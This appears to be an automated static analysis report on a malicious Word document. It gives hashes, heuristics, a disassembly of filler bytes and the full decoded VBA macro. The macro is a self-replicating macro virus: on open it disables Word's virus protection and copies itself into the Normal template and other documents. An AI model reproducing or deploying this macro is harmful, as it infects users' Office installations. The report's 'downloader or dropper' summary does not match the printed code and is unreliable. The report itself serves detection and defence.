Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 4b784b448f0ddc8a…

MALICIOUS

Office (OLE)

105.5 KB Created: 2018-11-19 02:07:00 Authoring application: Microsoft Office Word First seen: 2020-02-04
MD5: a4a9082db8703ff7301308a4915336e6 SHA-1: ea1c6d32f6dc0e3c5f19aa3193a2fe498a547790 SHA-256: 4b784b448f0ddc8a1722d72ea6311b143287503bb19803c35f76789011045eab
170 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1566.001 Spearphishing Attachment

This document contains VBA macros, specifically a Document_Open macro designed to execute code upon opening. The macro attempts to replace its own code with content from the first 20 lines of the `ThisDocument` module, suggesting it's a downloader or dropper. The presence of a 'Password-protected archive handoff' heuristic indicates the macro may be intended to decrypt or retrieve a payload from an encrypted archive. The ClamAV detection further confirms its malicious nature.

Heuristics 6

  • ClamAV: Doc.Macro.APMPKILL-6097118-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Macro.APMPKILL-6097118-0
  • Heap-spray pattern detected high SC_HEAP_SPRAY
    Repeated 0x41 (A) bytes found
    Disassembly
    Attempted x86 opcode disassembly
    0000A722  41                inc ecx
    0000A723  41                inc ecx
    0000A724  41                inc ecx
    0000A725  41                inc ecx
    0000A726  41                inc ecx
    0000A727  41                inc ecx
    0000A728  41                inc ecx
    0000A729  41                inc ecx
    0000A72A  41                inc ecx
    0000A72B  41                inc ecx
    0000A72C  41                inc ecx
    0000A72D  41                inc ecx
    0000A72E  41                inc ecx
    0000A72F  41                inc ecx
    0000A730  41                inc ecx
    0000A731  41                inc ecx
    0000A732  41                inc ecx
    0000A733  41                inc ecx
    0000A734  41                inc ecx
    0000A735  41                inc ecx
    0000A736  41                inc ecx
    0000A737  41                inc ecx
    0000A738  41                inc ecx
    0000A739  41                inc ecx
    0000A73A  41                inc ecx
    0000A73B  41                inc ecx
    0000A73C  41                inc ecx
    0000A73D  41                inc ecx
    0000A73E  41                inc ecx
    0000A73F  41                inc ecx
    0000A740  41                inc ecx
    0000A741  41                inc ecx
    0000A742  41                inc ecx
    0000A743  41                inc ecx
    0000A744  41                inc ecx
    0000A745  41                inc ecx
    0000A746  41                inc ecx
    0000A747  41                inc ecx
    0000A748  41                inc ecx
    0000A749  41                inc ecx
    0000A74A  41                inc ecx
    0000A74B  41                inc ecx
    0000A74C  41                inc ecx
    0000A74D  41                inc ecx
    0000A74E  41                inc ecx
    0000A74F  41                inc ecx
    0000A750  41                inc ecx
    0000A751  41                inc ecx
    0000A752  41                inc ecx
    0000A753  41                inc ecx
    0000A754  41                inc ecx
    0000A755  41                inc ecx
    0000A756  41                inc ecx
    0000A757  41                inc ecx
    0000A758  41                inc ecx
    0000A759  41                inc ecx
    0000A75A  41                inc ecx
    0000A75B  41                inc ecx
    0000A75C  41                inc ecx
    0000A75D  41                inc ecx
    0000A75E  41                inc ecx
    0000A75F  41                inc ecx
    0000A760  41                inc ecx
    0000A761  41                inc ecx
    0000A762  41                inc ecx
    0000A763  41                inc ecx
    0000A764  41                inc ecx
    0000A765  41                inc ecx
    0000A766  41                inc ecx
    0000A767  41                inc ecx
    0000A768  41                inc ecx
    0000A769  41                inc ecx
    0000A76A  41                inc ecx
    0000A76B  41                inc ecx
    0000A76C  41                inc ecx
    0000A76D  41                inc ecx
    0000A76E  41                inc ecx
    0000A76F  41                inc ecx
    0000A770  41                inc ecx
    0000A771  41                inc ecx
    0000A772  41                inc ecx
    0000A773  41                inc ecx
    0000A774  41                inc ecx
    0000A775  41                inc ecx
    0000A776  41                inc ecx
    0000A777  41                inc ecx
    0000A778  41                inc ecx
    0000A779  41                inc ecx
    0000A77A  41                inc ecx
    0000A77B  41                inc ecx
    0000A77C  41                inc ecx
    0000A77D  41                inc ecx
    0000A77E  41                inc ecx
    0000A77F  41                inc ecx
    0000A780  41                inc ecx
    0000A781  41                inc ecx
  • Password-protected archive handoff high SE_PASSWORD_ARCHIVE_LURE
    Document gives password instructions for an archive or attachment — often used to keep payloads encrypted until after gateway scanning
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    'KILL
    Private Sub Document_Open()
       On Error Resume Next
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 1086 bytes
SHA-256: a8e47de383d7047002ffbc39050de92bda3cb4985642e0f4f5ddf8ca290054e7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "AztSiw1, 0, 0, AZTSIWLib, AztSiw"
'APMP
'KILL
Private Sub Document_Open()
   On Error Resume Next
   Application.DisplayStatusBar = False
   Options.VirusProtection = False
   Options.SaveNormalPrompt = False
   MyCode = ThisDocument.VBProject.VBComponents(1).CodeModule.Lines(1, 20)
   Set Host = NormalTemplate.VBProject.VBComponents(1).CodeModule
   If ThisDocument = NormalTemplate Then _
      Set Host = ActiveDocument.VBProject.VBComponents(1).CodeModule
   With Host
       If .Lines(1, 1) = "APMP" & .Lines(1, 2) <> "KILL" Then
          .DeleteLines 1, .CountOfLines
          .InsertLines 1, MyCode
          If ThisDocument = NormalTemplate Then _
             ActiveDocument.SaveAs ActiveDocument.FullName
       End If
   End With
End Sub